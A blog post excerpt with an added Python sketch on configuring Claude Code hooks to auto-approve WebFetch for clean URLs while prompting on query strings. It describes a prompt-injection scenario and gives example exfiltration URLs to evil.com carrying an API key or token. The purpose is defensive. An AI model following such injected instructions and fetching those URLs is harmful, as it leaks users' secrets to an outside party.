
Claude Code: Auto-Approve Tools While Keeping a Safety Net with Hooks
Every time Claude Code fetches a URL, it asks for permission. After the 50th approval for a docs page, you start wondering — can I just auto-allow this?

You can. But there's a catch: WebFetch can send data in query parameters. A prompt injection buried in a file could trick Claude into fetching https://evil.com?secret=YOUR_API_KEY. Auto-approving everything means you'd never see it happen.

Here's how I set up a middle ground: auto-allow clean URLs, but show a confirmation prompt when query parameters are present.

The naive approach (don't do this)

You might think adding WebFetch to permissions is enough:

    // ~/.claude/settings.json
    {
      "permissions": {
        "allow": ["WebFetch"]
      }
    }

This works — but it auto-allows everything, including https://evil.com?token=abc123. No safety net.

The hook approach (do this instead)

Claude Code has a PreToolUse hook system. A hook runs before every tool call and can:

- Exit 0 — silently allow (no prompt)
- Exit 1 — show a message and ask for confirmation (a
Continue reading on Dev.to
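
The hook described in the excerpt above, sketched as an added example (not the author's script or Anthropic's code). It assumes the hook receives the tool call as JSON on stdin with `tool_name` and `tool_input.url` keys, uses the exit codes the article lists, and goes slightly beyond query parameters by also flagging embedded credentials and non-http(s) schemes:

```python
#!/usr/bin/env python3
"""PreToolUse hook sketch: exit 0 for clean URLs, exit 1 when a URL can carry data."""
import json
import sys
from urllib.parse import urlsplit

ALLOW, ASK = 0, 1  # exit codes as described in the article


def data_carrying_parts(url: str) -> list[str]:
    """Return the reasons a URL should be shown to the user (empty list = clean)."""
    try:
        parts = urlsplit(url.strip())
        host = parts.hostname
    except ValueError:
        return ["unparsable URL"]
    reasons = []
    if parts.scheme not in ("http", "https") or not host:
        reasons.append("not a plain http(s) URL")
    if parts.query:
        reasons.append(f"query string: ?{parts.query}")
    if parts.username or parts.password:
        reasons.append("credentials embedded before the host")
    return reasons


def decide(event: dict) -> tuple[int, str]:
    """Map one hook event to (exit code, message for the user)."""
    # Assumption: the event names the tool and carries the URL under these keys.
    if event.get("tool_name") != "WebFetch":
        return ASK, "this hook only vets WebFetch"  # never silently allow other tools
    url = (event.get("tool_input") or {}).get("url")
    if not isinstance(url, str) or not url:
        return ASK, "WebFetch call without a readable URL"
    reasons = data_carrying_parts(url)
    if reasons:
        return ASK, f"WebFetch to {url} carries data ({'; '.join(reasons)})"
    return ALLOW, ""


if __name__ == "__main__":
    try:
        code, message = decide(json.load(sys.stdin))
    except (json.JSONDecodeError, AttributeError):
        code, message = ASK, "hook could not parse its input"  # fail closed
    if message:
        print(message, file=sys.stderr)
    sys.exit(code)
```

The check only inspects the URL components named in the code; it does not judge the destination host or path.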


